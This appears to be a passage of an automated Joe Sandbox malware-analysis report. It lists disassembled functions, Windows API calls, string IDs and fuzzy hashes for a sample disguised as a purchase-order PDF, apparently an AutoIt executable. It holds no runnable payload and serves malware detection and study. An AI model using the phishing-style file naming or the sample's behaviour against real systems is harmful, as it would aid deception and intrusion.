                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: InternetOpen
                                                                                                                                                                                                                                                                                                            • String ID: <local>
                                                                                                                                                                                                                                                                                                            • API String ID: 2038078732-4266983199
                                                                                                                                                                                                                                                                                                            • Opcode ID: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                                                                                                                                                                                                                                                                                                            • Instruction ID: 525aca290fb55aeb65c4bf55ca0deee88c9418ef2a1db54778758d1eb2e06c8a
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9011A934144751AAF621DF108D86FB77794FB50B01F50480FF9866B2C0D6F4B848C766
                                                                                                                                                                                                                                                                                                            Function 004695F7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000180,00000000,00000000), ref: 00469660
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessageSend_wcslen
                                                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                            • API String ID: 455545452-1403004172
                                                                                                                                                                                                                                                                                                            • Opcode ID: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                                                                                                                                                                                                                                                                                                            • Instruction ID: 486d2595d5a7427da4a9c048e684990a8dc9cac685a8154682435d05c4426571
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A101D87274121027C600BA259C01AEBB39CEB96354F04443BF94597291EA6DED0E43AA
                                                                                                                                                                                                                                                                                                            Function 0046956F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000182,00000182,?,00000000), ref: 004695D6
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessageSend_wcslen
                                                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                            • API String ID: 455545452-1403004172
                                                                                                                                                                                                                                                                                                            • Opcode ID: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                                                                                                                                                                                                                                                                                                            • Instruction ID: 72d13aeac174e9c1a3a177398698555a642000804846b33da1492f44d6438514
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4D01A77374111067C610BA6A9C01AEB739CABD2364F44443BF94597292EA7DED0E43AA
                                                                                                                                                                                                                                                                                                            Function 00461774 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: _strncmp
                                                                                                                                                                                                                                                                                                            • String ID: ,$UTF8)
                                                                                                                                                                                                                                                                                                            • API String ID: 909875538-2632631837
                                                                                                                                                                                                                                                                                                            • Opcode ID: 727c7c5760fb27673dbb24875b26f121239a8201232c39922ad2fa80f7f85d54
                                                                                                                                                                                                                                                                                                            • Instruction ID: 35c0b5e4e6bd282640ba12729024cfd3588da47ca1ed1c49f01331a057b7ec9b
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 727c7c5760fb27673dbb24875b26f121239a8201232c39922ad2fa80f7f85d54
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7601B575A083805BE720DE20CC85BA773A1AB81319F58492ED8D5872A1F73DD449C75B
                                                                                                                                                                                                                                                                                                            Function 00461772 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: _strncmp
                                                                                                                                                                                                                                                                                                            • String ID: ,$UTF8)
                                                                                                                                                                                                                                                                                                            • API String ID: 909875538-2632631837
                                                                                                                                                                                                                                                                                                            • Opcode ID: abd9c85c193eb76a615b38e8260140970f327620044c052ec7ea970ca86f7e2a
                                                                                                                                                                                                                                                                                                            • Instruction ID: b3c6803870d1b21283bf32431af321d4190ac902c568a1d8b2e557ddf245ca97
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: abd9c85c193eb76a615b38e8260140970f327620044c052ec7ea970ca86f7e2a
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E01D875A043805BE720DE20CC85B6773A19B4131AF68492FD8D6872A1F73DD449C75B
                                                                                                                                                                                                                                                                                                            Function 004560AD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560BA
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 004560E9
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessageSend_mallocwsprintf
                                                                                                                                                                                                                                                                                                            • String ID: %d/%02d/%02d
                                                                                                                                                                                                                                                                                                            • API String ID: 1262938277-328681919
                                                                                                                                                                                                                                                                                                            • Opcode ID: 5e9390f3fa6d631e890f8db483ee3f325bf10843f83bb080d9b0d170336394c6
                                                                                                                                                                                                                                                                                                            • Instruction ID: 2a73c44ac592e0fe880a68d863bd42ca8887a008949f121bccc13d44bcf2ebb3
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e9390f3fa6d631e890f8db483ee3f325bf10843f83bb080d9b0d170336394c6
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 13F08272744220A7E2105BA5AC01BBFB3D4EB84762F10443BFE44D12C0E66E8455D7BA
                                                                                                                                                                                                                                                                                                            Function 00442262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0044226C
                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0044227F
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                                            • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                                                            • Opcode ID: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                                                                                                                                                                                                                                                                                            • Instruction ID: f0ed9326d30a696a9ade51716a531e8bd1705000bbe21894ac7a57cb5589152b
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 71D0A772F8130177E92077706D0FFCB26246F14710F010C3AB305AA1C0D4E8D440C358
                                                                                                                                                                                                                                                                                                            Function 0044222A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00442240
                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000), ref: 00442247
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                                            • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                                                            • Opcode ID: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                                                                                                                                                                                                                                                            • Instruction ID: d1e5b9be119239975405e397b0c0efdc35250005003305bf123d4268f2ecb06f
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4DD05E72B813013BE92076706D0FF8B26246B14710F010C2AB205AA1C0D4E8A4408358
                                                                                                                                                                                                                                                                                                            Function 00439514 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00439522
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00411A1F: _doexit.LIBCMT ref: 00411A2B
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Message_doexit
                                                                                                                                                                                                                                                                                                            • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                                                                                            • API String ID: 1993061046-4017498283
                                                                                                                                                                                                                                                                                                            • Opcode ID: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                                                                                                                                                                                                                                                            • Instruction ID: 5d68346425d2699d55792fe39b85c2381918ba1f955abba655776c5540820644
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 82B092343C038627E20437A01C0BF8C28049B64F42F220C2AB308384D259D90080231E